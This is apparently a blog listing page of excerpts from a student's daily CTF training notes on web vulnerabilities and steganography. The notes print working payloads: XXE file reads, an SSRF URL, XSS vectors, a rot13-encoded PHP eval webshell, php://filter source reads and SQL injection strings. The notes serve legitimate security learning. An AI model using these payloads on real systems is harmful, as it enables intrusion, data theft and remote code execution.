![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
文章平均质量分 83
陆小朝
ORZ唯年休假与绩效不可辜负
展开
-
8月8日Misc隐写训练
题记第一题题目:思路:隐写的题,尤其是图片的题,我的思路一般就是先看题目提示,如果有提示就顺着提示走,没有提示就是以下流程,1、右键notpad++查看hex代码,简易分析是否存在文件头补充、IHDR、明显的flag、较为不同的其他格式等2、kali中使用binwalk与foremost进行图片查看分离3、steg打开查看色道,或者lsb4、步骤一两张一摸一样的图片,先确定考察知识点应该是1、steg的异或;2、binwalk的不同查询后没有任何明显的flag信息。步骤二将图片放原创 2020-08-09 15:20:31 · 597 阅读 · 0 评论 -
8月7日CTF反序列化训练
题目一题目:思路:根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可步骤一源码分析:class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if原创 2020-08-08 13:58:08 · 1618 阅读 · 0 评论 -
8月6日CTF命令执行训练
题记:抽空写第一题题目:<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+|\_|\^/",$c原创 2020-08-06 16:40:00 · 1680 阅读 · 0 评论 -
8月5日xxe漏洞训练
题记:复制粘贴的一天今天的重点是xxe漏洞,本地环境需要搭建服务器,可搭建云服务器,做题的重点反而是伪协议各种常用语句的使用<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag.php">]><note> <info>&xxe;</info></note>//file协议获取原创 2020-08-05 17:32:12 · 466 阅读 · 0 评论 -
8月4日题目解析
第一题题目:<!DOCTYPE html><html><head> <title></title></head><body><!--error_reporting(0);$flag='flag';if ($_GET['name1'] === $_GET['password1'] || MD5($_GET['name1']) != MD5($_GET['password1'])) { d原创 2020-08-04 19:14:22 · 742 阅读 · 0 评论 -
8月3日ssrf漏洞解析训练
第一题题目:思路:点击logo获取如下界面分析:本题链接暴漏两个问题,一是flag.php在根目录下(原因前面的index.php就在根目录下,一般的话两者在同一目录下);二是img参数(因此需要构造对应的img链接,然后形成破损图片并保存)步骤一:构造payload:http://39.71.44.204:21029/index.php?img=Http://127.0.0.1/flag.php找到图片源新建窗口打开地址:http://39.71.44.204:21029原创 2020-08-03 18:06:33 · 790 阅读 · 0 评论 -
8月2日xss漏洞分析训练
题记:今天老师也出了三道题,但是对于XSS而言题目数量少,较难组织成规律,因此找了这个在线网址可实现在线做题。思路:做题以前先理顺一下思路,首先传统语句测试//script脚本风格<script>alert(1)</script><script>window.data = alert(1)</script>(意义不大)//img标签<img src="" onerror=alert(1);>//href链接<a hre原创 2020-08-02 18:29:00 · 2056 阅读 · 1 评论 -
8月1日CTF文件上传训练
题记:满足于只做出一道题的今天一、伪协议上传题目:思路:代码表示需要使用伪协议上传,且不能用base64dir=php://filter/write=string.rot13/resource=file.php制作rot13cmd.php内容:<?cuc @riny($_CBFG['pzq']);?>//<?php @eval($_POST['cmd']);?>的rot13编码在dir处写payload:php://filter/write=string.原创 2020-08-01 19:17:42 · 1140 阅读 · 0 评论 -
7月31日CTF文件漏洞训练
题记今天主要是文件上传及下载,高难度第三题一、文件包含题目:思路:文件包含,右键源代码,利用data、filte等伪协议传参步骤一:发现注入点右键源代码发现php链接新页面点击后快速结束,需要抓包步骤二:伪协议分析上述代码发现传参file,同时屏蔽了tp、input、data等协议。同时增加了一个flag.php(直接打开可不行)本页面上编辑伪协议file=php://filter/read=convert.base64-encode/resource=flag.php bas原创 2020-07-31 17:01:34 · 1326 阅读 · 0 评论 -
7月30日CTFsql注入训练
题记:这几天最崩溃的,鼓捣了两个小时,从正确答案到绕过所有终止符,从托库出数据表数据字段到non-numeric,闹混了头。以此为戒切勿钻牛角尖。一、报错注入题目:思路:很明显,本题是报错注入,注意被绕过的关键词就可以步骤一:试探首先是随意提交个用户名和密码,发现是get传参,尝试测试几个关键词,如‘ “ 空格 = + - )等,以及select、union、or、information等没有屏蔽且符合报错注入判断标准的如上图被屏蔽的关键词如上图因此可以测试出来,本题为单引号注入,且空格原创 2020-07-30 23:14:00 · 1006 阅读 · 0 评论 -
7月29日CTFsql注入训练
一、g00d_sql题目:思路:这个题其实就是weblib闯关的一道题两个输入框分别是用户名和密码,主要考注入步骤一:试探先用户名输入1,密码1,试一试发现报错后,试一试万能密码 1’ or 1=1#明显可以采用注入的方式步骤二:手工注入按照以下步骤开工:1)判断是否存在注入点;2)判断字段长度;3)判断字段回显位置;4)判断数据库信息;5)查找数据库名;6)查找数据库表;7)查找数据库表中所有字段以及字段值;payload:-1’ union select 1,gr原创 2020-07-29 14:02:34 · 942 阅读 · 0 评论 -
CTF7月29日笔记---sql注入漏洞
sql基本属性sql漏洞注入的本质攻击者利用WEB应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令。sql注入类型1.数字型原理:当输入的参数为整型时,如ID、年龄、页码等,如果存在注入漏洞,则可以认为是数字型注入。测试步骤:http://www.example.com/test.php?id=8' 返回异常http://www.example.com/test.php?id=8 and 1=1 返回正常原创 2020-07-29 12:20:34 · 1171 阅读 · 0 评论